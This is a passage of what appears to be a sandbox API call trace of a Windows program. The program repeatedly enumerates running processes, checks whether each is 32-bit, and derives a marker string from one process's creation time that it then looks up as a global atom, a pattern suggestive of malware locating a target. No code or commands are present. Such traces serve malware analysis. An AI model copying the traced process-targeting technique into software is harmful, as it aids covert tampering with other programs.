	[0098.426] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.426] CloseHandle (hObject=0x2e8) returned 1
	[0098.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2e8
	[0098.426] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.426] CloseHandle (hObject=0x2e8) returned 1
	[0098.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2e8
	[0098.427] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.427] CloseHandle (hObject=0x2e8) returned 1
	[0098.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2e8
	[0098.427] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.427] CloseHandle (hObject=0x2e8) returned 1
	[0098.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2e8
	[0098.427] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.427] CloseHandle (hObject=0x2e8) returned 1
	[0098.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2e8
	[0098.427] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.427] CloseHandle (hObject=0x2e8) returned 1
	[0098.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2e8
	[0098.427] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.427] CloseHandle (hObject=0x2e8) returned 1
	[0098.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2e8
	[0098.428] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.428] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.428] GetProcessTimes (in: hProcess=0x2e8, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.428] wsprintfA (in: param_1=0x66d2b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.428] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.429] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.429] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.429] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.429] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.429] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.429] CloseHandle (hObject=0x2e8) returned 1
	[0098.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2e8
	[0098.429] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.429] CloseHandle (hObject=0x2e8) returned 1
	[0098.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2e8
	[0098.430] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.430] CloseHandle (hObject=0x2e8) returned 1
	[0098.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16818) returned 0xc0000004
	[0098.486] VirtualAlloc (lpAddress=0x0, dwSize=0x16918, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000
	[0098.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2eb0000, Length=0x16918, ResultLength=0x0 | out: SystemInformation=0x2eb0000, ResultLength=0x0) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x348
	[0098.491] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.491] CloseHandle (hObject=0x348) returned 1
	[0098.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x348
	[0098.491] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.491] CloseHandle (hObject=0x348) returned 1
	[0098.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x348
	[0098.492] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.492] CloseHandle (hObject=0x348) returned 1
	[0098.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x348
	[0098.492] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.492] CloseHandle (hObject=0x348) returned 1
	[0098.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x348
	[0098.492] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.492] CloseHandle (hObject=0x348) returned 1
	[0098.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x348
	[0098.492] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.492] CloseHandle (hObject=0x348) returned 1
	[0098.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x348
	[0098.492] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.492] CloseHandle (hObject=0x348) returned 1
	[0098.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x348
	[0098.493] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.493] CloseHandle (hObject=0x348) returned 1
	[0098.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x348
	[0098.493] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.493] CloseHandle (hObject=0x348) returned 1
	[0098.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x348
	[0098.493] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.493] CloseHandle (hObject=0x348) returned 1
	[0098.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x348
	[0098.493] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.493] CloseHandle (hObject=0x348) returned 1
	[0098.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x348
	[0098.494] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.494] CloseHandle (hObject=0x348) returned 1
	[0098.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x348
	[0098.494] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.494] CloseHandle (hObject=0x348) returned 1
	[0098.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x348
	[0098.494] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.494] CloseHandle (hObject=0x348) returned 1
	[0098.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x348
	[0098.494] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.494] CloseHandle (hObject=0x348) returned 1
	[0098.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x348
	[0098.494] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.494] CloseHandle (hObject=0x348) returned 1
	[0098.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x348
	[0098.495] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.495] CloseHandle (hObject=0x348) returned 1
	[0098.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x348
	[0098.495] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.495] CloseHandle (hObject=0x348) returned 1
	[0098.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x348
	[0098.495] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.495] CloseHandle (hObject=0x348) returned 1
	[0098.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x348
	[0098.495] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.495] CloseHandle (hObject=0x348) returned 1
	[0098.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x348
	[0098.495] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.495] CloseHandle (hObject=0x348) returned 1
	[0098.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x348
	[0098.495] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.496] CloseHandle (hObject=0x348) returned 1
	[0098.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x348
	[0098.496] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.496] CloseHandle (hObject=0x348) returned 1
	[0098.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x348
	[0098.496] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.496] CloseHandle (hObject=0x348) returned 1
	[0098.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x348
	[0098.496] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.496] CloseHandle (hObject=0x348) returned 1
	[0098.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x348
	[0098.496] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.496] CloseHandle (hObject=0x348) returned 1
	[0098.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x348
	[0098.496] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.496] CloseHandle (hObject=0x348) returned 1
	[0098.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x348
	[0098.497] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.497] CloseHandle (hObject=0x348) returned 1
	[0098.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x348
	[0098.497] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.497] CloseHandle (hObject=0x348) returned 1
	[0098.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x348
	[0098.497] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.497] CloseHandle (hObject=0x348) returned 1
	[0098.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x348
	[0098.497] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.498] CloseHandle (hObject=0x348) returned 1
	[0098.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x348
	[0098.498] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.498] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.498] GetProcessTimes (in: hProcess=0x348, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.499] wsprintfA (in: param_1=0x6743f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.499] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.499] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.499] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.499] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.499] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.499] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.500] CloseHandle (hObject=0x348) returned 1
	[0098.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x348
	[0098.500] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.500] CloseHandle (hObject=0x348) returned 1
	[0098.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x348
	[0098.500] IsWow64Process (in: hProcess=0x348, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.500] CloseHandle (hObject=0x348) returned 1
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x368
	[0098.581] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.581] CloseHandle (hObject=0x368) returned 1
	[0098.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x368
	[0098.582] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.582] CloseHandle (hObject=0x368) returned 1
	[0098.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x368
	[0098.582] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.582] CloseHandle (hObject=0x368) returned 1
	[0098.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x368
	[0098.582] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.582] CloseHandle (hObject=0x368) returned 1
	[0098.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x368
	[0098.582] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.582] CloseHandle (hObject=0x368) returned 1
	[0098.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x368
	[0098.582] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.582] CloseHandle (hObject=0x368) returned 1
	[0098.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x368
	[0098.583] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.583] CloseHandle (hObject=0x368) returned 1
	[0098.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x368
	[0098.583] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.583] CloseHandle (hObject=0x368) returned 1
	[0098.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x368
	[0098.583] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.583] CloseHandle (hObject=0x368) returned 1
	[0098.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x368
	[0098.583] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.583] CloseHandle (hObject=0x368) returned 1
	[0098.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x368
	[0098.584] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.584] CloseHandle (hObject=0x368) returned 1
	[0098.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x368
	[0098.584] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.584] CloseHandle (hObject=0x368) returned 1
	[0098.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x368
	[0098.584] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.584] CloseHandle (hObject=0x368) returned 1
	[0098.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x368
	[0098.584] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.584] CloseHandle (hObject=0x368) returned 1
	[0098.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x368
	[0098.584] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.585] CloseHandle (hObject=0x368) returned 1
	[0098.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x368
	[0098.585] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.585] CloseHandle (hObject=0x368) returned 1
	[0098.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x368
	[0098.585] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.585] CloseHandle (hObject=0x368) returned 1
	[0098.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x368
	[0098.585] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.585] CloseHandle (hObject=0x368) returned 1
	[0098.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x368
	[0098.585] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.585] CloseHandle (hObject=0x368) returned 1
	[0098.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x368
	[0098.586] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.586] CloseHandle (hObject=0x368) returned 1
	[0098.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x368
	[0098.586] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.586] CloseHandle (hObject=0x368) returned 1
	[0098.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x368
	[0098.586] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.586] CloseHandle (hObject=0x368) returned 1
	[0098.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x368
	[0098.586] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.586] CloseHandle (hObject=0x368) returned 1
	[0098.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x368
	[0098.586] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.586] CloseHandle (hObject=0x368) returned 1
	[0098.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x368
	[0098.587] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.587] CloseHandle (hObject=0x368) returned 1
	[0098.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x368
	[0098.587] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.587] CloseHandle (hObject=0x368) returned 1
	[0098.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x368
	[0098.587] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.587] CloseHandle (hObject=0x368) returned 1
	[0098.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x368
	[0098.587] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.587] CloseHandle (hObject=0x368) returned 1
	[0098.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x368
	[0098.587] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.587] CloseHandle (hObject=0x368) returned 1
	[0098.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x368
	[0098.587] IsWow64Process (in: hProcess=0x368, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.587] CloseHandle (hObject=0x368) returned 1
	[0098.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x368
